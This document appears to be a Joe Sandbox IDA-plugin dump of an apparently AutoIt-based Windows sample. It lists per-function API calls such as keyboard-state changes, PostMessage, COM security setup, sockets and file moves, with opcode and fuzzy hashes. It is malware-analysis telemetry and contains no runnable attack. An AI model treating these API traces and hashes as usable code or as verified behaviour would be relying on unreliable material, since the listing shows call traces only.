                                                                                      • API String ID: 2550207440-0
                                                                                      • Opcode ID: 8c9794d313ef56ebe8df06a480acc9892b27d5acda359b81a321912778f85a5d
                                                                                      • Instruction ID: af883c478f994ef19ecd04ddc84113973f39256346aaa48cb53b8ec51c9b5325
                                                                                      • Opcode Fuzzy Hash: 8c9794d313ef56ebe8df06a480acc9892b27d5acda359b81a321912778f85a5d
                                                                                      • Instruction Fuzzy Hash: 6C910271A00218AFDB00EF94C884BBEB7F9FF45319F194029E910EB291D774E942DB98
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 3722211da4197d8335889d59bead01fbb2abe060499f1455d66e32890fbe8c0a
                                                                                      • Instruction ID: daa4a189429b1f118013b290f58e9ad8faf771d79cde92db8ba1cd58097f4ce8
                                                                                      • Opcode Fuzzy Hash: 3722211da4197d8335889d59bead01fbb2abe060499f1455d66e32890fbe8c0a
                                                                                      • Instruction Fuzzy Hash: 15916871E00219EFCB10CFA9DC84AEEBBB8FF49320F148559E915B7251D378AA41DB60
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C9396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C93A7A
                                                                                      • _wcslen.LIBCMT ref: 00C93A8A
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C93C1F
                                                                                        • Part of subcall function 00C80CDF: VariantInit.OLEAUT32(00000000), ref: 00C80D1F
                                                                                        • Part of subcall function 00C80CDF: VariantCopy.OLEAUT32(?,?), ref: 00C80D28
                                                                                        • Part of subcall function 00C80CDF: VariantClear.OLEAUT32(?), ref: 00C80D34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4137639002-1221869570
                                                                                      • Opcode ID: c5993585428f7e8d750642fc3336e546eb7321bc69238b6926913c144686b5c1
                                                                                      • Instruction ID: 9aa5a9f4648dfdcd15fc2ebcbc841e4b83edc6ac306afdef0c455f435ffec567
                                                                                      • Opcode Fuzzy Hash: c5993585428f7e8d750642fc3336e546eb7321bc69238b6926913c144686b5c1
                                                                                      • Instruction Fuzzy Hash: 919198746083419FCB00EF64C48496AB7E4FF89314F14892EF89A9B351DB30EE46DB92
                                                                                      APIs
                                                                                        • Part of subcall function 00C7000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?,?,00C7035E), ref: 00C7002B
                                                                                        • Part of subcall function 00C7000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70046
                                                                                        • Part of subcall function 00C7000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?,?), ref: 00C70054
                                                                                        • Part of subcall function 00C7000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C6FF41,80070057,?), ref: 00C70064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C94C51
                                                                                      • _wcslen.LIBCMT ref: 00C94D59
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C94DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00C94DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 614568839-2785691316
                                                                                      • Opcode ID: 672db2963c193229af4316c6d75588531374d2c0ff64d5f39899a2eb1783ef43
                                                                                      • Instruction ID: dbbae78feccd10028025debe4100a0f9e63dfa0d66dda1984dd6178cdd19795a
                                                                                      • Opcode Fuzzy Hash: 672db2963c193229af4316c6d75588531374d2c0ff64d5f39899a2eb1783ef43
                                                                                      • Instruction Fuzzy Hash: 15911671D00219EFDF14DFA4C895EEEB7B8BF09314F10816AE919A7291EB309A45DF60
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 00CA2183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00CA21B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CA21DD
                                                                                      • _wcslen.LIBCMT ref: 00CA2213
                                                                                      • GetMenuItemID.USER32(?,?), ref: 00CA224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 00CA225B
                                                                                        • Part of subcall function 00C73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73A57
                                                                                        • Part of subcall function 00C73A3D: GetCurrentThreadId.KERNEL32 ref: 00C73A5E
                                                                                        • Part of subcall function 00C73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C725B3), ref: 00C73A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA22E3
                                                                                        • Part of subcall function 00C7E97B: Sleep.KERNEL32 ref: 00C7E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 4196846111-0
                                                                                      • Opcode ID: 1095ded45972645de6b5102780c3901a674ffdcf337ddbbccaa00f4cd472cfec
                                                                                      • Instruction ID: e7a1a425effe4f2738ca43d521bcb1f700fa1329d0cc4cbd116fe97e2a50c56f
                                                                                      • Opcode Fuzzy Hash: 1095ded45972645de6b5102780c3901a674ffdcf337ddbbccaa00f4cd472cfec
                                                                                      • Instruction Fuzzy Hash: DB71B335E00216AFCB10DFA8C881BAEB7F5EF4A324F108458E916EB351D734EE419B90
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00C7AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 00C7AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 00C7AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C7AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C7AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C7B020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 4688906ac090826a93ac113c9ed6df3857baef8a7de03b18c524953368b93084
                                                                                      • Instruction ID: 086114510bd47e1c4864d8aaa98ab49b208d0606d8a3fb019c38b90a88c483c1
                                                                                      • Opcode Fuzzy Hash: 4688906ac090826a93ac113c9ed6df3857baef8a7de03b18c524953368b93084
                                                                                      • Instruction Fuzzy Hash: C851C1E06087D53DFB3682748845BBEBEA95B46304F08C589E1ED958C3C398AED4D751
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 00C7AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 00C7AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 00C7AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C7ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C7ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C7AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C7AE38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: e22d98b5cd12958a560b682b8196e8c42791b30e2d7002ee6ca49d5f856728cc
                                                                                      • Instruction ID: f6a44ab7ec1f8439095392ef2265719d83ea5371a11eca2a843f522b27594c7f
                                                                                      • Opcode Fuzzy Hash: e22d98b5cd12958a560b682b8196e8c42791b30e2d7002ee6ca49d5f856728cc
                                                                                      • Instruction Fuzzy Hash: 4951D6A15047D53DFB3683348C95BBE7EA96B86300F08C489E1ED468C3D294EE94E752
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00C53CD6,?,?,?,?,?,?,?,?,00C45BA3,?,?,00C53CD6,?,?), ref: 00C45470
                                                                                      • __fassign.LIBCMT ref: 00C454EB
                                                                                      • __fassign.LIBCMT ref: 00C45506
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00C53CD6,00000005,00000000,00000000), ref: 00C4552C
                                                                                      • WriteFile.KERNEL32(?,00C53CD6,00000000,00C45BA3,00000000,?,?,?,?,?,?,?,?,?,00C45BA3,?), ref: 00C4554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,00C45BA3,00000000,?,?,?,?,?,?,?,?,?,00C45BA3,?), ref: 00C45584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: de5afda4caaca981d0fc51550d453be4d37a525d4a6bfdda3aaa85da87dc339f
                                                                                      • Instruction ID: 87f799220b33e1268d50cd7cb76d57d4f8ffcccb486c60c6ff9d3fb40e050203
                                                                                      • Opcode Fuzzy Hash: de5afda4caaca981d0fc51550d453be4d37a525d4a6bfdda3aaa85da87dc339f
                                                                                      • Instruction Fuzzy Hash: 7651C3B1A00649AFDB11CFA8D885BEEBBF9FF09310F14411AF955E7292D7309A41CB60
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C32D4B
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00C32D53
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C32DE1
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00C32E0C
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C32E61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: 0073106204bd138aa915a011456cb3cd79456d5cf3284cbb5c61a25f54efde63
                                                                                      • Instruction ID: f904f1f1777378d395fc78f1ea3065b82b53f8907ae2d776f204633d5ad1dcd6
                                                                                      • Opcode Fuzzy Hash: 0073106204bd138aa915a011456cb3cd79456d5cf3284cbb5c61a25f54efde63
                                                                                      • Instruction Fuzzy Hash: 3241D534E20209EBCF10DF68CC85A9EBBB5BF44325F148156E925AB392D731EA05CBD1
                                                                                      APIs
                                                                                        • Part of subcall function 00C9304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C9307A
                                                                                        • Part of subcall function 00C9304E: _wcslen.LIBCMT ref: 00C9309B
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C91112
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C91121
                                                                                      • WSAGetLastError.WSOCK32 ref: 00C911C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 00C911F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2675159561-0
                                                                                      • Opcode ID: 357c2c931211a55ffdde612fc36e237729619dfdb1d9daa842df05f72029b3ba
                                                                                      • Instruction ID: ce6fb58a3d4dde851fa4a73c497ec31783931eef653d6ac91d98dbcb9da2d875
                                                                                      • Opcode Fuzzy Hash: 357c2c931211a55ffdde612fc36e237729619dfdb1d9daa842df05f72029b3ba
                                                                                      • Instruction Fuzzy Hash: 3741E731600205AFDB109F54C889BADB7E9FF46368F188059FD259B291C774EE81CBE1
                                                                                      APIs
                                                                                        • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7CF22,?), ref: 00C7DDFD
                                                                                        • Part of subcall function 00C7DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7CF22,?), ref: 00C7DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C7CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C7CF7F
                                                                                      • _wcslen.LIBCMT ref: 00C7D005
                                                                                      • _wcslen.LIBCMT ref: 00C7D01B
                                                                                      • SHFileOperationW.SHELL32(?), ref: 00C7D061
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 3164238972-1173974218
                                                                                      • Opcode ID: a95836862f6c154e9a7ce7390624d4bfaa4f75075428bb48e22f89db649e53c9
                                                                                      • Instruction ID: ac7324059765c478c2d6bd2e929d7b73c0f0483c8f91b32f9264cb5b95657d9a
                                                                                      • Opcode Fuzzy Hash: a95836862f6c154e9a7ce7390624d4bfaa4f75075428bb48e22f89db649e53c9
                                                                                      • Instruction Fuzzy Hash: 294154719052195FDF12EFA4C9C1BDEB7BCAF19380F0040EAE509EB142EA34A788DB50
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CA2E1C
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA2E4F
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA2E84
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CA2EB6
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CA2EE0
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA2EF1
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CA2F0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 2178440468-0
                                                                                      • Opcode ID: 22d297d87d376fba98b81619aee8c252aca06bc0b584464b4fbc64b17598e45f
                                                                                      • Instruction ID: d9b30bedb621b1d4647a81da5e4fef2459cadffdda321c4c26ca688651948ae6
                                                                                      • Opcode Fuzzy Hash: 22d297d87d376fba98b81619aee8c252aca06bc0b584464b4fbc64b17598e45f
                                                                                      • Instruction Fuzzy Hash: 2C31E2306041A2AFDB21CF5CDCC4FA937E1EB4A729F190164F9118F2A2CB71AD90DB41
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C77769
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C7778F
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C77792
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00C777B0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00C777B9
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C777DE
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00C777EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: e655c08fbf5483112eab978998dab207190e477f457691beb86c9879d165c5ca
                                                                                      • Instruction ID: 2f8b681f4cac58f69f02ff3b5b7b6c046a025bd39096de34bb8e1ca78d44147d
                                                                                      • Opcode Fuzzy Hash: e655c08fbf5483112eab978998dab207190e477f457691beb86c9879d165c5ca
                                                                                      • Instruction Fuzzy Hash: E021AE7660421DAFDB15DFA8DC88EBF77ACEB093647008125BA18DB190D670DD42C764
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C77842
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C77868
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C7786B
                                                                                      • SysAllocString.OLEAUT32 ref: 00C7788C
                                                                                      • SysFreeString.OLEAUT32 ref: 00C77895
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C778AF
                                                                                      • SysAllocString.OLEAUT32(?), ref: 00C778BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: 69cc563ba255e5955f0771e90a90ca8d6a3b8b2594b2db1c9b23d7bed450b1a8
                                                                                      • Instruction ID: 31c8666d4d915d2022d49ae9bb2f21b20e8fcd57da2fa3d9e49674c98e5c2e44
                                                                                      • Opcode Fuzzy Hash: 69cc563ba255e5955f0771e90a90ca8d6a3b8b2594b2db1c9b23d7bed450b1a8
                                                                                      • Instruction Fuzzy Hash: 79216031608218AFDB109FB8DC8CEBA77ECEB09764710C225F919DB2A1DA74DD41CB65
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00C804F2
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C8052E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 5ff784aae3ec35c7b596d3cf0f1a61676a931bbcdecedc13d70fd88b172e187c
                                                                                      • Instruction ID: 301d0c93f27dcfb515e0ac3741a19c7fdd7bedd640b5066f357c0f599820fb5b
                                                                                      • Opcode Fuzzy Hash: 5ff784aae3ec35c7b596d3cf0f1a61676a931bbcdecedc13d70fd88b172e187c
                                                                                      • Instruction Fuzzy Hash: E0217C71600305AFDB20AF29D844B9A77A4AF45728F304A29E8B1D72E0D7709A48CF28
                                                                                      APIs
